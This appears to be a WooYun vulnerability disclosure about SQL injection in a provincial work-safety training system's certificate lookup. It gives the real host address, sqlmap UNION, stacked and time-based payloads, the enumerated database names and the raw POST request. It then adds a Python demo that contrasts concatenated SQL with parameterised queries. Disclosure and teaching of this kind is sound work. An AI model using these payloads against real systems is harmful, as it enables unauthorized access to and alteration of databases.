WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-10-11: Details sent to the vendor, awaiting vendor handling
2014-10-16: Vendor confirmed; details visible to the vendor only
2014-10-26: Details disclosed to core white hats and relevant domain experts
2014-11-05: Details disclosed to regular white hats
2014-11-15: Details disclosed to intern white hats
2014-11-25: Details disclosed to the public
SQL injection in a provincial work-safety training system
From http://exam.hebsafety.gov.cn/ one reaches the certificate lookup page at http://110.249.219.99:7700/RS22/pub/pubQuery.jsp. The values entered on this page are injectable; sqlmap output for the POST fields follows.
Parameter: #1*
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: read_only=1&actionType=&StudentId=&QualificationTypeCode=&AssessmentNature=&showBase=&showTrain=&showExam=&showCert=&StudentName=111' UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(106)+CHAR(108)+CHAR(113)+CHAR(85)+CHAR(109)+CHAR(83)+CHAR(107)+CHAR(83)+CHAR(78)+CHAR(89)+CHAR(111)+CHAR(104)+CHAR(104)+CHAR(113)+CHAR(97)+CHAR(100)+CHAR(121)+CHAR(113)-- &IDNumber=111&DiplomaNumber=11
    Vector: UNION ALL SELECT [QUERY]--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: read_only=1&actionType=&StudentId=&QualificationTypeCode=&AssessmentNature=&showBase=&showTrain=&showExam=&showCert=&StudentName=111'; WAITFOR DELAY '0:0:5'--&IDNumber=111&DiplomaNumber=11
    Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: read_only=1&actionType=&StudentId=&QualificationTypeCode=&AssessmentNature=&showBase=&showTrain=&showExam=&showCert=&StudentName=111' WAITFOR DELAY '0:0:5'--&IDNumber=111&DiplomaNumber=11
    Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
there were multiple injection points, please select the one to use for following injections:
[0] place: (custom) POST, parameter: #2*, type: Single quoted string (default)
[1] place: (custom) POST, parameter: #1*, type: Single quoted string
[q] Quit
> 1
[10:05:15] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[10:05:15] [INFO] fetching database names
[10:05:15] [INFO] the SQL query used returns 8 entries
[10:05:15] [DEBUG] performed 0 queries in 0.30 seconds
available databases [8]:
[*] master
[*] model
[*] msdb
[*] pxks_tb
[*] ReportServer
[*] ReportServerTempDB
[*] RS22
[*] tempdb
Request sent (the `*` after each field value is sqlmap's custom injection marker; `#1*` and `#2*` in the output above refer to these markers in order):
POST /RS22/trainExam/pubPerson!doPubQuery.action HTTP/1.1
Host: 110.249.219.99:7700
Proxy-Connection: keep-alive
Content-Length: 163
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://110.249.219.99:7700
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://110.249.219.99:7700/RS22/trainExam/pubPerson!pubQuery.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=F8EFA60E22D72F310BF52BA4AF3C7D8B

read_only=1&actionType=&StudentId=&QualificationTypeCode=&AssessmentNature=&showBase=&showTrain=&showExam=&showCert=&StudentName=aaa*&IDNumber=aaa*&DiplomaNumber=aaa*
Not authorized, so I did not go further. Impact: the database can be dumped and its data modified.
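The bug class behind the three sqlmap findings above is the same in every case: the StudentName, IDNumber and DiplomaNumber values are spliced into the SQL text as single-quoted literals, so a quote in the value closes the literal and what follows runs as SQL. The added example below (my code, not the RS22 application's; the schema, column names and rows are constructed stand-ins, since the real table layout is not on the page) reproduces the UNION vector against an in-memory SQLite database next to the parameterised form that fixes it. SQL Server's CHAR()+CHAR() string building and WAITFOR DELAY have no SQLite equivalent, so only the UNION vector is reproduced, adapted to a three-column SELECT; in the JSP application the equivalent fix is a JDBC PreparedStatement with `?` placeholders instead of string concatenation.

```python
import sqlite3

# Constructed stand-in schema for the certificate lookup (assumption: the real RS22
# table and column names are not on the page; rows and hash are made up).
SCHEMA = """
CREATE TABLE cert (student_name TEXT, id_number TEXT, diploma_number TEXT);
INSERT INTO cert VALUES ('Zhang San', '130100199001011234', 'D-0001');
INSERT INTO cert VALUES ('Li Si',     '130100199202022345', 'D-0002');
CREATE TABLE app_user (username TEXT, pw_hash TEXT);
INSERT INTO app_user VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def query_vulnerable(conn, student_name, id_number, diploma_number):
    """Bug class from the report: each POST field is spliced into the SQL text as a
    single-quoted literal, so a quote in the value terminates the literal and the
    rest of the value is parsed as SQL."""
    sql = ("SELECT student_name, id_number, diploma_number FROM cert "
           f"WHERE student_name = '{student_name}' "
           f"AND id_number = '{id_number}' "
           f"AND diploma_number = '{diploma_number}'")
    return conn.execute(sql).fetchall()


def query_fixed(conn, student_name, id_number, diploma_number):
    """Hardened form: bind parameters. Values travel separately from the statement,
    so quotes, UNION or ';' inside a value are data, never SQL."""
    sql = ("SELECT student_name, id_number, diploma_number FROM cert "
           "WHERE student_name = ? AND id_number = ? AND diploma_number = ?")
    return conn.execute(sql, (student_name, id_number, diploma_number)).fetchall()


# Same shape as the captured payload: the ' closes the StudentName literal, UNION ALL
# appends rows from another table, and -- comments out the IDNumber and DiplomaNumber
# predicates. The column list is adapted to this 3-column SELECT.
UNION_PAYLOAD = "111' UNION ALL SELECT username, pw_hash, NULL FROM app_user--"


def run_demo():
    conn = make_db()
    results = {}
    # Honest lookup: both code paths return the same certificate row.
    results["legit_vuln"] = query_vulnerable(conn, "Zhang San", "130100199001011234", "D-0001")
    results["legit_fixed"] = query_fixed(conn, "Zhang San", "130100199001011234", "D-0001")
    # Injected StudentName: the concatenated query leaks app_user rows ...
    results["inject_vuln"] = query_vulnerable(conn, UNION_PAYLOAD, "111", "11")
    # ... while the parameterised query looks for a student literally named that.
    results["inject_fixed"] = query_fixed(conn, UNION_PAYLOAD, "111", "11")
    # The probe sqlmap starts with, a stray quote: SQL error versus empty result.
    try:
        query_vulnerable(conn, "111'", "111", "11")
        results["quote_vuln"] = "no error"
    except sqlite3.OperationalError:
        results["quote_vuln"] = "syntax error"
    results["quote_fixed"] = query_fixed(conn, "111'", "111", "11")
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The stray-quote probe is why an error-message difference (or, when errors are suppressed, a timing difference from WAITFOR DELAY) is enough for sqlmap to confirm the point: only the concatenated version ever sees a malformed statement.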
Vendor: 华夏明科(北京)数字技术有限公司
Severity: High
Vulnerability Rank: 11
Confirmed: 2014-10-16 09:05
Vendor reply: none